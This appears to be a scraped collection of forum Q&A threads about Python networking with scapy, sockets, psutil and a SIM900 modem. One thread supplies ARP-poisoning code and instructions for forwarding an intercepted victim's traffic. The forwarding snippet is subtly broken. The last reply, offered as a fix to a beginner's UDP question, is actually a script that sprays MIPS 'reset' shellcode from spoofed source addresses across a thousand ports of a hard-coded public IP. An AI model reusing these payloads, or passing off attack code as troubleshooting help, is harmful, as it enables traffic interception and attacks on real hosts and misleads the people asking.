Sorry, I must be missing something, just adapting a very simple script :
from scapy.all import *
def packet_callback(packet):
if packet[TCP].payload:
print '[*] Source : %s || Destination: %s' % (packet[IP].src,packet[IP].dst)
hexdump(packet[TCP].payload)
sniff(filter="tcp port 80 and host 10.0.0.21", prn=packet_callback, store=0)
This shows HTTP packets content from a specified host, but only incoming ones. If I adapt the IP to mine, I can see all of them.
This is a wireless interface I am listening on. Interface is in monitor mode, using tcpdump I can see all packets from everyone.
System is Linux Mint 17.
Any hint greatly appreciated.
Related
I am trying to get the destination IP (remote host) addresses connected to my machine that are using UDP protocol but i get Null results using psutil
the script I wrote
import psutil
def GetServerIP():
PROCNAME = "theprocessname.exe"
for proc in psutil.process_iter():
if proc.name() == PROCNAME:
pinfo = proc.as_dict(attrs=['pid', 'name', 'create_time'])
pidnumber = pinfo["pid"]
print("Process is runnging on number: %r" % (pidnumber))
for connection in psutil.net_connections(kind='udp4'):
if pidnumber in connection:
print(connection.raddr)
GetServerIP()
The script works for TCP connections but gives nothing on UDP connections that are established on my local machine.
I read through psutil documentation however still cant figure out why it gives no results back on UDP
I can verify there are established UDP packets being sent and received using wireshark
if psutil does not work well with UDP is there an alternative solution
It seems like psutil was not the right solution and path to take, turned out UDP connections are not established like TCP, so instead I switched to python scapy to capture UDP packets and it helped me resolve the destination IP address
I wanted to make a "proxy" while ARP poisoning, it works with UDP and if I send a pkt to google I see it on my pc using wireshark
def trick(gate_mac, victim_mac):
'''Tricks the victim and the gate_way, using arp'''
my_mac=ARP()
my_mac=my_mac.hwsrc
sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= victim_ip, psrc = gate_ip, hwdst= victim_mac))
sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= gate_ip, psrc = victim_ip, hwdst= my_mac))
print "TRICKED"
that is the function i wrote to arp poison, now I want to send all the packets I get from the victim's pc to the router/
but I have no clue how to do packet forwarding.
You can simply activate your OS packet forwarding. If you're running Linux, a simple sysctl -w net.ipv4.ip_forward=1 should do that.
You may also need to let the packets pass your firewall;something like iptables -A FORWARD -s victim_ip -j ACCEPT; iptables -A FORWARD -d victim_ip -j ACCEPT should work (if you're using Linux, again).
Under other OSes, you need to find out how to enable packet forwarding and if needed add firewall rules. If you cannot enable packet forwarding, you can run another Scapy script to forward packets for you. Here is an example:
VICTIM_MAC = "00:01:23:45:67:89"
GATEWAY_MAC = "00:98:76:54:32:10"
_SRC_DST = {
GATEWAY_MAC: VICTIM_MAC,
VICTIM_MAC: GATEWAY_MAC,
}
def forward_pkt(pkt):
pkt[Ether].dst = _SRC_DST.get(pkt[Ether].src, GATEWAY_MAC)
sendp(dst)
sniff(
prn=forward_pkt,
filter="ip and (ether src %s or ether src %s)" % (VICTIM_MAC,
GATEWAY_MAC)
)
So you have a basic understanding of the parts im using, I have:
Arduino Uno
Seeed Studio GPRS Shield v2.0 (http://www.seeedstudio.com/wiki/GPRS_Shield_V2.0)
Ultimate GPS for Adafruit V3.3 (https://www.adafruit.com/products/746?gclid=Cj0KEQjw3-W5BRCymr_7r7SFt8cBEiQAsLtM8qn4SCfVWIvAwW-x9Mu-FLeB6hLmVd0PAPVU8IAXXPgaAtaC8P8HAQ)
Here is my problem:
I have tested the Arduino stacked with the GPRS shield, and it works fine with regards to accessing the internet through TCP, sending SMS, etc.. However, my application requires me to send GPS data from the adafruit GPS to a web server that I have already coded with Django and postgresql. The backend is set up.
I need to send the data from the Uno (client) to my laptop (server), which I coded in python (This is just to check whether it is creating a connection):
#!/usr/bin/env python
import socket
# import postgres database functions
TCP_IP = '192.168.1.112'
TCP_PORT = 10000
BUFFER_SIZE = 40
server_address = (TCP_IP,TCP_PORT)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created.'
# Bind socket to TCP server and port
try:
s.bind(server_address)
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket Bind Complete.'
# Start Listening on socket
s.listen(1) # Puts socket into server mode
print 'Listening on port: ', TCP_PORT
# Now Keep Talking with the client
while (1):
# Wait to accept a connection
conn, addr = s.accept() # Wait for incoming connection with accept()
print 'Connection address:', addr
data = conn.recv(BUFFER_SIZE)
if not data: break
print "recieved data: data", data
conn.send(data) #echo
conn.close()
I dont think there is a problem with this. From this I will post data to my postgreSQL database. However, When I try to use AT commands on the SIM900 module to connect to the server using port 10000, I cannot connect:
AT+CIPSHUT
SHUT OK
AT+CGATT?
+CGATT: 1
OK
AT+CIPMUX=0
OK
AT+CSTT="fast.t-mobile.com","",""
OK
AT+CIICR
OK
AT+CIFSR
6.60.94.49
AT+CIPSTART="TCP","192.168.1.112,"10000"
OK
STATE: TCP CLOSED
CONNECT FAIL
I have tried connecting through TCP and replaced the AT+CIPSTART line with the below statement and it worked, so I know TCP works:
AT+CIPSTART="TCP","www.vishnusharma.com", "80"
Is the IP i'm using wrong? I'm new to this, but if it makes a difference, im using Ubuntu 16.04 partitioned on my Mac OSX. I have also checked the APN for T-mobile and it seems fine.
Any help would be greatly appreciated. Thank You!
The IP you're using is inside a NAT since it starts with 192.168. Unless you have a private apn with the mobile operator you're using, you won't be able to reach your Ubuntu from a public IP. Your ISP gives you a public IP address which ir administrated by your router, so if you want this to work, you'll have to do a port forwarding from your router to your Ubuntu.
To do the port forwarding you have to get in the router's configuration page (Typically 192.168.1.1 but depends on the model) an there you'll have to redirect the port XXX to 192.168.1.112:10000. After that you have to obtain your public IP (curl ifconfig.co) and use it to access from the SIM900.
First of all as a suggestion, you can combine the two shields by using SIM908 (unless you are getting more precision on your GPS shield). Since your TCP connection is working, I bet that the port 10000 on your ubuntu is blocked by the firewall. You can first try to turn off your firewall and see if it works. If it did not worked its something else. If it worked, turn on your firewall and then unblock the tcp port using the following command:
sudo ufw allow 10000/tcp
I am trying to set up a Python socket between my Raspberry Pi (running Raspbian) and my Macbook Pro (running Mavericks).
Both devices are connected to the same WiFi network in my appt. I run the server code on my RPi and then the client code on my Macbook (I have also tried the reverse). I think that I am missing a set up step because the code I am using I found on multiple sites, so I assume it works. I also checked that my Macbook has firewall turned off.
Server Code:
from socket import *
host = "127.0.0.1"
print host
port = 7777
s = socket(AF_INET, SOCK_STREAM)
print "Socket Made"
s.bind((host,port))
print "Socket Bound"
s.listen(5)
print "Listening for connections..."
q,addr = s.accept()
data = raw_input("Enter data to be sent: ")
q.send(data)
Client Code:
from socket import *
host = "127.0.0.1"
print host
port=4446
s=socket(AF_INET, SOCK_STREAM)
print "socket made"
s.connect((host,port))
print "socket connected!!!"
msg=s.recv(1024)
print "Message from server : " + msg
I get the error:
Traceback (most recent call last):
File "TCPclient.py", line 9, in <module>
s.connect((host,port))
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py",
line 224, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 61] Connection refused
My process for executing the code is:
type "python TCPserver.py" into RPi terminal
type "python TCPclient.py into Macbook terminal
Then I receive the error message on my Macbook, no error on the RPi
My questions are:
Is 127.0.0.1 the proper input for "host"? (please note I also tried "localhost")
Does the input for host have to be the same for the client and server code?
Should the RPi and Macbook both be connected to the same WiFi network?
Is there any set up that needs to be done on either the RPi or my Macbook in order for this to work (Please note my RPi is Model B, new, and I did not set up anything else on it before this)
Do you know why I am receiving this error and how to fix it?
Your help is greatly appreciated!!
127.0.0.1 is a special IP address for local machine.
You must set the real IP address (on your LAN) of you mac in the client code.
You should also bind on this IP on the server, or on 0.0.0.0 to bind on all available IP addresses.
You must also use the same port number on both client and server.
And to reply to your questions:
Is 127.0.0.1 the proper input for "host"? (please note I also tried "localhost")
127.0.0.1 is the same than localhost, it means the local machine. This will work if you run the client and the server on the same machine, else you need the real IP address of your mac. Try ifconfig in a console.
Does the input for host have to be the same for the client and server code?
Yes and no. On the server you bind to a port and an address, so you'll wait for connections on this port and address. You can use the IP address, or 0.0.0.0.
Should the RPi and Macbook both be connected to the same WiFi network?
Yes and no. It will work with the same WiFi network, but it will also work with two different WiFi networks if they are connected together directly or with a IP router. Most of the time though they are connected to the internet through a NAT (network address translator), and then it will not work.
Is there any set up that needs to be done on either the RPi or my Macbook in order for this to work (Please note my RPi is Model B, new, and I did not set up anything else on it before this)
I don't know much about the RPi but it looks like standard TCP sockets, that should work out of the box.
Do you know why I am receiving this error and how to fix it?
As I stated at the beginning: You try to connect to the RPi (127.0.0.1) on the wrong port.
You have created a listener on port 7777, then you connected on 4446 !!!!!
just connect on the same port you are listening to =)
I made a simple program that tries to send a UDP packet to my ncat server
here is the code:
from scapy.all import *
sr1(IP(dst="127.0.0.1")/UDP(dport=8080)/"TAG1")
but I get nothing from my ncat server, can someone please tell me what I am doing wrong?
when developing a network related project, i suggest you install capturing software like tcpdump or wireshark. It hepls you to see what is in the network.
To get all packets to 127.0.0.1 using tcpdump, you may use following command:
tcpdump -i eth0 "dst 127.0.0.1 and dst port 8080"
Try this
from scapy.all import *
print("Remote UDP Mips Fuzzer - Reset Shellcode")
for num in range(0,10):
data = "00" * int(str(num))
sc = "3c06432134c6fedc3c05281234a519693c04fee13484dead24020ff80101010c"
a = data+sc
for ip in range(0,255):
for port in range(0,1000):
i=IP()
i.dst="213.48.152.128" #Change this
i.src="10.0"+"."+str(ip)+"."+str(ip)
udp=UDP()
udp.sport=int(str(port))
udp.dport=int(str(port))
sendp(i/udp/a)
See how it works ?